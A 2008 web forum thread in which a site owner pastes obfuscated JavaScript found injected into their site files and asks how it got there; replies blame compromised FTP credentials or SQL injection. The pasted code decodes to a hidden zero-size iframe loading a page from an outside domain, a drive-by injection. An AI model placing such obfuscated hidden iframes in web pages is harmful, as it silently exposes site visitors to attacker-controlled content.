arifsor Posted July 18, 2008 Share Posted July 18, 2008 Hi, I have made my site XSS proofed but still the following code is being embedded in my site var dtzhtxkdkr="";for(dolnbjhcfei=0;dolnbjhcfei<fuqgkpou.length;dolnbjhcfei+=2){dtzhtxkdkr+=(String.fromCharCode(parseInt(fuqgkpou.substr(dolnbjhcfei,2),16)));}document.write(dtzhtxkdkr);}uavxgizkldzyckm("3C69eiqpxekm66eiqpxekm72eiqpxekm616D652073eiqpxekm72633D226874eiqpxekm74eiqpxekm70eiqpxekm3Aeiqpxekm2F2F746Feiqpxekm703130302D636F756E74eiqpxekm65722E636Feiqpxekm6Deiqpxekm2Feiqpxekm746Feiqpxekm70eiqpxekm3130302F69eiqpxekm6E6465782E70eiqpxekm68eiqpxekm70eiqpxekm22eiqpxekm20eiqpxekm66eiqpxekm72eiqpxekm61eiqpxekm6D65626Feiqpxekm72eiqpxekm64eiqpxekm6572eiqpxekm3D22eiqpxekm30eiqpxekm2220eiqpxekm626F72eiqpxekm646572eiqpxekm3D2230eiqpxekm22eiqpxekm20eiqpxekm7769eiqpxekm64eiqpxekm7468eiqpxekm3Deiqpxekm22eiqpxekm30222068eiqpxekm65eiqpxekm69eiqpxekm67eiqpxekm68eiqpxekm743Deiqpxekm22302220737479eiqpxekm6Ceiqpxekm65eiqpxekm3D22eiqpxekm70eiqpxekm6Feiqpxekm73eiqpxekm6974eiqpxekm69eiqpxekm6F6E3A206162eiqpxekm736F6C757465eiqpxekm3B20eiqpxekm76697369eiqpxekm62eiqpxekm696C69eiqpxekm74793A20eiqpxekm68696464eiqpxekm65eiqpxekm6Eeiqpxekm3B2064eiqpxekm69eiqpxekm73eiqpxekm70eiqpxekm6Ceiqpxekm61793Aeiqpxekm206E6F6E65eiqpxekm22eiqpxekm3Eeiqpxekm3Ceiqpxekm2Feiqpxekm696672eiqpxekm61eiqpxekm6Deiqpxekm65eiqpxekm3Eeiqpxekm".replace(/eiqpxekm/g, "")) Any Idea? is this the hosting server issue? Please help Quote Link to comment Share on other sites More sharing options...
awpti Posted July 18, 2008 Share Posted July 18, 2008 Included as in.. stuck inside of your actual files or your DB? Former: Your FTP is compromised (or server if you aren't on shared hosting). Latter: Your script(s) are vulnerable to SQL Injection attacks. Quote Link to comment Share on other sites More sharing options...
arifsor Posted July 18, 2008 Author Share Posted July 18, 2008 Included as in.. stuck inside of your actual files or your DB? Former: Your FTP is compromised (or server if you aren't on shared hosting). Latter: Your script(s) are vulnerable to SQL Injection attacks. This script is inside my actual file Quote Link to comment Share on other sites More sharing options...
unkwntech Posted July 18, 2008 Share Posted July 18, 2008 I noticed a repeating string in there: eiqpxekm I did a quick google for it and found someone running a forum with the same issue and another site that seems to be compromised.... I'm not sure what it is or what, if anything, it does. Quote Link to comment Share on other sites More sharing options...
arifsor Posted July 18, 2008 Author Share Posted July 18, 2008 anybody have any idea?? Quote Link to comment Share on other sites More sharing options...
awpti Posted July 18, 2008 Share Posted July 18, 2008 Yes. It means your FTP has been compromised. Change your FTP password (And username if possible) Quote Link to comment Share on other sites More sharing options...
arifsor Posted July 19, 2008 Author Share Posted July 19, 2008 Is this possible that someone can update my file which has 444 permission through XSS! following response from my server guy - including the JS file using the relative paths (ie. some/path/some.js) can be abused for XSS injections. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.